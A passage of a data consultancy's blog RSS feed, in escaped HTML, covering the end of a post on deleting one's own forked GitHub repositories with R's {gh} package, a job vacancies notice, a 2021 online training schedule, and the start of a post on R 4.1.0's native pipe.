&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# You probably don&amp;#39;t want to do this!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;to_delete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; forked_repos&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Otherwise, create a vector of repositories to delete&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;to_delete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;bob-does-tidytuesday&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;melindas-cool-project&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;a-random-r-package&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally we delete using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(to_delete,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;gh&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;DELETE /repos/:owner/:repo&amp;#34;&lt;/span&gt;, owner &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; my_username, repo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .x))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And… they’re gone!&lt;/p&gt;
&lt;p&gt;Deleting forked repositories like this is an effective way to clean out
your GitHub of repositories that you haven’t looked at or touched in a
while. However, unlike doing it manually, there is no confirmation where
you have to type out a specific repository’s name to confirm that you
actually are deleting what you want to be deleting. So, be extremely
careful when deleting repositories using {gh} as you don’t want to lose
hours of work by accidentally running the wrong line.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/github-clean-remove-forks/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job vacancies at Jumping Rivers!</title><link>https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/</link><pubDate>Tue, 01 Jun 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In line with the continuous growth at Jumping Rivers, we are looking to
expand our team of dedicated professionals working in our teams. If you
are enthusiastic and keen to develop your skills in cutting edge data
science or infrastructure please read on!&lt;/p&gt;
&lt;h2 id="who-are-we-and-what-do-we-do"&gt;Who are we and what do we do?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is an analytics company
whose passion is data and machine learning. We help our clients move
from data storage to data insights. The company has three key strands:
training, data engineering and machine learning consultancy. As a small
company, the roles are rarely clear cut. We think this is a good thing;
the team get to experience different ideas and concepts, never stuck on
mundane tasks.&lt;/p&gt;
&lt;h2 id="where-are-we-based"&gt;Where are we based?&lt;/h2&gt;
&lt;p&gt;We are based in Newcastle upon Tyne in the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst
Building&lt;/a&gt; - home to the
&lt;a href="https://www.ncl.ac.uk/nicd/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;. But
half the company is remote (within the UK). We trust our team to manage
their own time. If you want to go a run in the afternoon and work later,
that’s fine with us!&lt;/p&gt;
&lt;p&gt;If you are based near Newcastle, then you can come into our office.
Alternatively, work where is convenient (provided you can get to London
and/or Edinburgh in reasonable time).&lt;/p&gt;
&lt;p&gt;We currently have two active job vacancies that we are accepting
applications for. The job titles and their corresponding specifications
can viewed by clicking on the links below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/junior-infrastructure-engineer-uk-remote_newcastle-upon-tyne" rel="external"&gt;Junior Infrastructure
Engineer&lt;/a&gt;
(01/07/2021 deadline)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/data-scientist-training-uk-remote_newcastle-upon-tyne" rel="external"&gt;Data Scientist + Training (UK
Remote)&lt;/a&gt;
(06/06/2021 deadline)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="dont-see-a-position-that-suits-your-skills"&gt;Don’t see a position that suits your skills?&lt;/h2&gt;
&lt;p&gt;Jumping Rivers is always looking for great talent. Send us an
&lt;a href="https://jumping-rivers.welcomekit.co/jobs/spontaneous-applications" rel="external"&gt;application&lt;/a&gt;
and we may consider you for an alternative role in our teams!&lt;/p&gt;
&lt;p&gt;If you would like to get in touch directly with any queries then please
email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers 2021 Online Training Schedule</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/</link><pubDate>Tue, 18 May 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Good news! In tandom with the loosening of lockdown restrictions,
Jumping Rivers has released the updated 2021 public, online training
course schedule. We are offering courses across multiple programming
languages, including R, Python, Stan, Scala and git. In the past year,
we have converted all of our courses to be online friendly and have
recieved great feedback in relation to interactivity, course structure
and overall attendee satisfaction. Some examples of feedback we have
recieved can be seen below:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“The live coding was well structured and the screen share made it very
immersive.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;“I thought the delivery of the content was well presented, and
extremely easy to follow”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;“Lots of exercises to test knowledge as the course proceeded. Clear
explanations for everything. Friendly and engaging presenter.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Early bird offers are currently avaiable for selected courses and all
courses come with a 25% student/academic discount. A summary of the
training courses on offer can be seen below:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;June:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;&lt;strong&gt;Introduction to
R:&lt;/strong&gt;&lt;/a&gt;
Learn the fundamentals of R and how to import, summarise and plot
data using the {tidyverse}.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;&lt;strong&gt;Programming with
R:&lt;/strong&gt;&lt;/a&gt;
Fundamental R techniques such as functions, for loops and
conditional expressions.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;July:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;&lt;strong&gt;Statistical Modelling with
R:&lt;/strong&gt;&lt;/a&gt;
Learn how to apply statitcial methods such as hypothesis testing,
regression analysis, clustering and principal components analysis
(PCA).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;&lt;strong&gt;Best Practices with
R:&lt;/strong&gt;&lt;/a&gt;
So you can write code? Great. But can you write code which is easy
to read, simple to maintain, reproducible and efficient?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;&lt;strong&gt;Introduction to Bayesian
Inference:&lt;/strong&gt;&lt;/a&gt;
A course on MCMC algorithms, Bayesian workflows and much more!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-pystan-monte-carlo/" rel="external"&gt;&lt;strong&gt;Introduction to Bayesian Inference using
PyStan:&lt;/strong&gt;&lt;/a&gt;
Learn how to apply Bayesian inference/MCMC methods using Python’s
interface to Stan, PyStan.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;&lt;strong&gt;Introduction to Bayesian Inference using
RStan:&lt;/strong&gt;&lt;/a&gt;
Learn how to apply Bayesian inference/MCMC methods using R’s
interface to Stan, RStan.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;August:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/" rel="external"&gt;&lt;strong&gt;Git For
Me:&lt;/strong&gt;&lt;/a&gt; A
Git course on the importance of tracking project progress via
version control.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;September:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;&lt;strong&gt;Introduction to
Python:&lt;/strong&gt;&lt;/a&gt;
An introductory Python course on importing, summarising and plotting
data..&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;&lt;strong&gt;Programming with
Python:&lt;/strong&gt;&lt;/a&gt;
An insight into fundamental Python techniques such as functions, for
loops and conditional expressions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-graphics-visualisation-matplotlib-seaborn-plotly/" rel="external"&gt;&lt;strong&gt;Python for Data
Visualisation:&lt;/strong&gt;&lt;/a&gt;
Examining Python packages used for building impactful visualisations
that communicate your data insights.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/scala-statistical-computing-data-science-apache-spark/" rel="external"&gt;&lt;strong&gt;Scala for Statistical Computing and Data
Science:&lt;/strong&gt;&lt;/a&gt;
A Scala course outlining how to manage builds and library
dependencies; Apache Spark and the Breeze Scala library.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;October:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-tensorflow-machine-learning/" rel="external"&gt;&lt;strong&gt;Python and
Tensorflow:&lt;/strong&gt;&lt;/a&gt;
Learn the main ideas of deep learning and how to implement them in
practice with tensorflow.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;&lt;strong&gt;Advanced Graphics with
R:&lt;/strong&gt;&lt;/a&gt;
Learn the much coveted {ggplot2} package. The {ggplot2} package can
create advanced and informative graphics.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;November:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;&lt;strong&gt;Spatial Data Analysis with
R:&lt;/strong&gt;&lt;/a&gt;
Discussing how to apply R’s powerful suite of geographical tools to
their own problems.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-r-markdown-dashboards/" rel="external"&gt;&lt;strong&gt;Reporting with R
Markdown:&lt;/strong&gt;&lt;/a&gt;
Learn how to dynamically create static/interactive documents;
automate the re-generation of these reports with respect to the data
in question.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For further information on any of our upcoming courses please visit our
&lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public course page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you would like to get in touch directly with any queries then please
email us at &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>New features in R 4.1.0</title><link>https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/</link><pubDate>Mon, 17 May 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-410-is-released"&gt;R-4.1.0 is released!&lt;/h1&gt;
&lt;p&gt;Rejoice! A new R release (v 4.1.0) is due on 18th May 2021. Typically
most major R releases don’t contain that many new features, but this
release does contain some interesting and important changes.&lt;/p&gt;
&lt;p&gt;This post summarises some of the notable changes introduced. More detail
on the changes can be found at the &lt;a href="https://cran.r-project.org/doc/manuals/r-devel/NEWS.html" rel="external"&gt;R
changelog&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="declining-support-for-32-bit-windows"&gt;Declining support for 32-bit Windows&lt;/h2&gt;
&lt;p&gt;The 4.1.x series will be the last to support 32-bit Windows systems.
This won’t affect most people, but if you have an old laptop you use for
occasional R fun, then this might cause an issue.&lt;/p&gt;
&lt;h2 id="new-syntax"&gt;New syntax&lt;/h2&gt;
&lt;p&gt;The stability of the base packages is a great strength of the R
ecosystem: both underpinning, and contrasting with, the rapid pace at
which contributed packages (CRAN, BioConductor) evolve.&lt;/p&gt;
&lt;p&gt;Imagine introducing a new feature into the R language. Even if problems
arise with the usability of that feature, it would need to be maintained
until at least the next major release, by which time thousands of
developers and analysts may depend upon it. Unsurprisingly, the R
maintainers are exceedingly cautious when introducing new syntax.&lt;/p&gt;
&lt;p&gt;Similarly, you should employ caution when using new syntax in your own
code. If you do use syntax that was introduced in R-4.1, be aware that
your code will &lt;em&gt;not&lt;/em&gt; run on versions of R that precede this. For
example, this may prevent your new analysis scripts from running on your
colleague’s computer, or prevent users from installing your new package.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-new-features-r410-pipe-anonymous-functions"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-native-pipe"&gt;The native pipe&lt;/h2&gt;
&lt;p&gt;When the {magrittr} package introduced the pipe to R in 2014, it was
building upon similar syntax in Unix / linux scripting languages (bash)
and functional programming languages (like F#), and aimed to&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“decrease development time and improve the readability and
maintainability of code”
&lt;a href="https://cran.r-project.org/web/packages/magrittr/vignettes/magrittr.html" rel="external"&gt;Bache, 2014&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To illustrate the value of pipeline-syntax, here is some code that
involves nested function calls:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Make a density plot of a sampled distribution:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You might rewrite it in separate steps, to better distinguish the order
in which the functions are called (&lt;code&gt;rnorm()&lt;/code&gt;, and then &lt;code&gt;density()&lt;/code&gt; and
then &lt;code&gt;plot()&lt;/code&gt;):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Make a density plot of a sampled distribution&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;raw_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;density_summary &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;(raw_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(density_summary)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But, unless you plan to reuse the samples (&lt;code&gt;raw_data&lt;/code&gt;) or their summary
(&lt;code&gt;density_summary&lt;/code&gt;), code like this may introduce many unnecessary
variables into your R environment. The {magrittr} pipe provides a nice
middle ground, that limits the use of unnecessary variables and
maintains the natural sequence of function-calls in the written code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;magrittr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R 4.1.0 introduces a pipe operator &lt;code&gt;|&amp;gt;&lt;/code&gt; into the base R syntax&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The new operator is nicer to type, and should be both more efficient and
easier to debug, than the {magrittr} pipe.&lt;/p&gt;
&lt;h3 id="the-native-pipe-vs-magrittr"&gt;The native pipe vs {magrittr}&lt;/h3&gt;
&lt;p&gt;Note that, &lt;code&gt;|&amp;gt;&lt;/code&gt; is not a drop-in replacement for all uses of &lt;code&gt;%&amp;gt;%&lt;/code&gt;. The
{magrittr} pipe allowed function-calls to be written with- or without
parentheses:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# With parentheses:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;a&amp;#34; &amp;#34;b&amp;#34; &amp;#34;c&amp;#34; &amp;#34;d&amp;#34; &amp;#34;e&amp;#34; &amp;#34;f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Without parentheses:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; head
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;a&amp;#34; &amp;#34;b&amp;#34; &amp;#34;c&amp;#34; &amp;#34;d&amp;#34; &amp;#34;e&amp;#34; &amp;#34;f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the native pipe the parentheses &lt;em&gt;must&lt;/em&gt; be present:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0: Make sure your parentheses are present:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;a&amp;#34; &amp;#34;b&amp;#34; &amp;#34;c&amp;#34; &amp;#34;d&amp;#34; &amp;#34;e&amp;#34; &amp;#34;f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The {magrittr} pipe allowed the caller to use the “piped-in” values
anywhere in the function call. The piped-in value is represented using a
dot (&lt;code&gt;.&lt;/code&gt;) as a place holder. For example, you could use those values as
the second argument:&lt;/p&gt;
